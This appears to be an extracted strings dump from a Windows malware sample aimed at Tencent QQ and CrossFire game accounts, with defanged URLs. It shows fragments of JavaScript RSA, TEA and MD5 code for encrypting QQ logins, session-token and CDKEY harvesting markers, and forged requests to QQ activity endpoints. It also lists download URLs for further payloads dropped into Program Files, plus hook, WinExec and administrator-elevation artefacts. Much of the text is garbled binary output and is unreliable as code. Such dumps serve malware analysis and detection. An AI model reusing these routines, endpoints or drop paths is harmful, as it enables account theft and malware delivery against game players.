return t.copyTo(e),
this.reduce(e),
for (; t.t <= this.mt2;) t[t.t  ] = 0;
n = i * this.mpl   ((i * this.mph   (t[e] >> 15) * this.mpl & this.um) << 15) & t.DM;
for (i = e   this.m.t, t[i]  = this.m.am(0, n, t, e, 0, this.m.t); t[i] >= t.DV;) t[i] -= t.DV,
t.clamp(),
t.drShiftTo(this.m.t, t),
t.compareTo(this.m) >= 0 && t.subTo(this.m, t)
if (t > 4294967295 || 1 > t) return p.ONE;
o = e.convert(this),
for (o.copyTo(i); --r >= 0;) if (e.sqrTo(i, n), (t & 1 << r) > 0) e.mulTo(n, o, i);
return e.revert(i)
return i = 256 > t || e.isEven() ? new B(e) : new Q(e),
this.exp(t, i)
W((new Date).getTime())
for (Z(), dt = nt(), dt.init(ht), mt = 0; mt < ht.length;   mt) ht[mt] = 0;
return dt.next()
for (e = 0; e < t.length;   e) t[e] = K()
for (i = 0, e = 0; 256 > e;   e) i = i   this.S[e]   t[e % t.length] & 255,
return o.setPublic(e, n),
o.encrypt(t)
i.prototype.doPublic = o,
i.prototype.setPublic = n,
i.prototype.encrypt = r;
st && "Microsoft Internet Explorer" == navigator.appName ? (p.prototype.am = c, rt = 30) : st && "Netscape" != navigator.appName ? (p.prototype.am = a, rt = 26) : (p.prototype.am = l, rt = 28),
p.prototype.DB = rt,
p.prototype.DM = (1 << rt) - 1,
p.prototype.DV = 1 << rt;
p.prototype.FV = Math.pow(2, at),
p.prototype.F1 = at - rt,
p.prototype.F2 = 2 * rt - at;
for (ct = "0".charCodeAt(0), lt = 0; 9 >= lt;   lt) gt[ct  ] = lt;
for (ct = "a".charCodeAt(0), lt = 10; 36 > lt;   lt) gt[ct  ] = lt;
for (ct = "A".charCodeAt(0), lt = 10; 36 > lt;   lt) gt[ct  ] = lt;
B.prototype.convert = P,
B.prototype.revert = D,
B.prototype.reduce = I,
B.prototype.mulTo = M,
B.prototype.sqrTo = U,
Q.prototype.convert = j,
Q.prototype.revert = V,
Q.prototype.reduce = O,
Q.prototype.mulTo = F,
Q.prototype.sqrTo = R,
p.prototype.copyTo = d,
p.prototype.fromInt = h,
p.prototype.fromString = f,
p.prototype.clamp = _,
p.prototype.dlShiftTo = q,
p.prototype.drShiftTo = C,
p.prototype.lShiftTo = S,
p.prototype.rShiftTo = T,
p.prototype.subTo = x,
p.prototype.multiplyTo = A,
p.prototype.squareTo = E,
p.prototype.divRemTo = N,
p.prototype.invDigit = H,
p.prototype.isEven = z,
p.prototype.exp = G,
p.prototype.toString = v,
p.prototype.negate = $,
p.prototype.abs = w,
p.prototype.compareTo = y,
p.prototype.bitLength = b,
p.prototype.mod = L,
p.prototype.modPowInt = X,
p.ZERO = m(0),
p.ONE = m(1);
if ("Netscape" == navigator.appName && navigator.appVersion < "5" && window.crypto && window.crypto.random) {
var _t = window.crypto.random(32);
for (ft = 0; ft < _t.length;   ft) ht[mt  ] = 255 & _t.charCodeAt(ft)
for (; vt > mt;) ft = Math.floor(65536 * Math.random()),
Y.prototype.nextBytes = J,
tt.prototype.init = et,
tt.prototype.next = it;
return Math.round(4294967295 * Math.random())
i = 0; i < t.length; i  ) {
var n = Number(t[i]).toString(16);
1 == n.length && (n = "0"   n),
i = 0; i < t.length; i  = 2) e  = String.fromCharCode(parseInt(t.substr(i, 2), 16));
for (var i = [], n = 0; n < t.length; n  ) i[n] = t.charCodeAt(n);
o = t.length;
for (e = 0; o > e; e  ) i = t.charCodeAt(e),
i > 0 && 127 >= i ? n.push(t.charAt(e)) : i >= 128 && 2047 >= i ? n.push(String.fromCharCode(192 | i >> 6 & 31), String.fromCharCode(128 | 63 & i)) : i >= 2048 && 65535 >= i && n.push(String.fromCharCode(224 | i >> 12 & 15), String.fromCharCode(128 | i >> 6 & 63), String.fromCharCode(128 | 63 & i));
return n.join("")
var i = t.length,
n = t.length;
for (var o = 0; o < i.length; o  ) i[o] = 0;
for (var t = (k.length, 0); 8 > t; t  ) v[t] ^= k[$   t];
if (e) for (var n = 0; n < t.length; n  ) i[n] = 255 & t.charCodeAt(n);
n = 0; n < t.length; n  = 2) i[o  ] = parseInt(t.substr(n, 2), 16);
for (var i = h(t, e), n = a(i), o = "", r = 0; r < n.length; r  ) o  = String.fromCharCode(n[r]);
return q.encode(o)
initkey: function(t, e) {
q.PADCHAR = "=",
q.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",
q.getbyte = function(t, e) {
var i = t.charCodeAt(e);
q.encode = function(t) {
if (1 != arguments.length) throw "SyntaxError: Not enough arguments";
var e, i, n = q.PADCHAR,
o = q.ALPHA,
r = q.getbyte,
var s = t.length - t.length % 3;
if (0 == t.length) return t;
p.push(o.charAt(i >> 18)),
p.push(o.charAt(i >> 12 & 63)),
p.push(o.charAt(i >> 6 & 63)),
p.push(o.charAt(63 & i));
switch (t.length - s) {
p.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   n   n);
p.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   o.charAt(i >> 6 & 63)   n)
return p.join("")
window.btoa || (window.btoa = q.encode)
return binl2hex(core_md5(str2binl(t), t.length * chrsz))
return binl2str(core_md5(str2binl(t), t.length * chrsz))
p = 0; p < t.length; p  = 16) {
i.length > 16 && (i = core_md5(i, t.length * chrsz));
var p = core_md5(n.concat(str2binl(e)), 512   e.length * chrsz);
return core_md5(o.concat(p), 640)
for (var e = Array(), i = (1 << chrsz) - 1, n = 0; n < t.length * chrsz; n  = chrsz) e[n >> 5] |= (t.charCodeAt(n / chrsz) & i) << n % 32;
i = (1 << chrsz) - 1, n = 0; n < 32 * t.length; n  = chrsz) e  = String.fromCharCode(t[n >> 5] >>> n % 32 & i);
for (var e = hexcase ? "0123456789ABCDEF": "0123456789abcdef", i = "", n = 0; n < 4 * t.length; n  ) i  = e.charAt(t[n >> 2] >> n % 4 * 8   4 & 15)   e.charAt(t[n >> 2] >> n % 4 * 8 & 15);
n = 0; n < 4 * t.length; n  = 3) for (var o = (t[n >> 2] >> 8 * (n % 4) & 255) << 16 | (t[n   1 >> 2] >> 8 * ((n   1) % 4) & 255) << 8 | t[n   2 >> 2] >> 8 * ((n   2) % 4) & 255, r = 0; 4 > r; r  ) i  = 8 * n   6 * r > 32 * t.length ? b64pad: e.charAt(o >> 6 * (3 - r) & 63);
for (var arr = [], i = 0; i < str.length; i  = 2) arr.push("\\x"   str.substr(i, 2));
return arr = arr.join(""),
if (! (Math.random() > (e || 1))) try {
var i = location.protocol   "//ui.ptlogin2.qq.com/cgi-bin/report?id="   t,
n = document.createElement("img");
n.src = i
for (var o = n ? t: md5(t), r = hexchar2bin(o), p = md5(r   e), s = RSA.rsa_encrypt(r), a = (s.length / 2).toString(16), c = TEA.strToBytes(i.toUpperCase(), !0), l = Number(c.length / 2).toString(16); l.length < 4;) l = "0"   l;
for (; a.length < 4;) a = "0"   a;
TEA.initkey(p);
var u = TEA.enAsBase64(a   s   TEA.strToBytes(e)   l   c);
u = u.replace(/[\/\ =]/g,function(t) {return {"/": "-"," ": "*","=": "_"} [t]});
u.replace(/[\/\ =]/g,
"/": "-",
" ": "*",
"=": "_"
o = n   e.toUpperCase(),
r = $.RSA.rsa_encrypt(o);
for (var hex = str.toString(16), len = hex.length, i = len; maxLength > i; i  ) hex = "0"   hex;
for (var arr = [], j = 0; maxLength > j; j  = 2) arr.push("\\x"   hex.substr(j, 2));
var result = arr.join("");
%Program Files%\Internet Explorer\iexplore.exe
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
@1970-01-01 08:00:00
ptlogin2
cf.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
-URL:
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
<P class=msg>
MsgBox
SysShadow.SubWnd
[VVV.111Ttt.com]
?kernel32.dll
crossfire.exe
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WU<fL.aF6bB=dM2aN<iE?hO1jL=jP.gP4cP>iQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WU<eL-bM;jP.cP>qN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WT<eL.bM;jP/dP>qN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WT<eL.bM:iP/dQ>qN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRSWHE\NSWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTg^bfaIhdZir^saJxgX~p_fhhjmrmrhnqtxjermtzsjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[NSWXFWYX[^aXcI]dV]bciJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsivxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYXZ^aXcI]dV]bbiJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsjvxxz|
wW.Gg
NA EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
NA FE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE\OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
Z|.Gw
MA,FE9KR?WC*[I7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsjvxxz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsivxxz|
MA,EE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[OSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE\NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
l.er;
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsjvxyz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUBMRRWHE[NSWXFWYXZ^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
8`!%x
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bciJE`ORjYEhYVqNIr\IyZTg^bfaIhdYir_saJwgX|p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjYEhYVqNIr\IyZTg^bfaIidYir_saJwgXzq^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidYir_saJwgXzr^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WT<fL.bM;iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
ÏYP
%4u3\2t
W.ctn
XX.ce
{Z,c
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
>%fZM
T2%xE
dQ]%U
#.mkTSx
.Ag.~
%f%%f
7".Fv
>.OsM
r.vDO
V2.6.1
\CF_data.ini
hXXp://VVV.baidu.com/
hXXp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
help.dll
\help.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGD:\
01/04/17
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
pt_mbkey
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=8
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30827&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30827&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=8
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
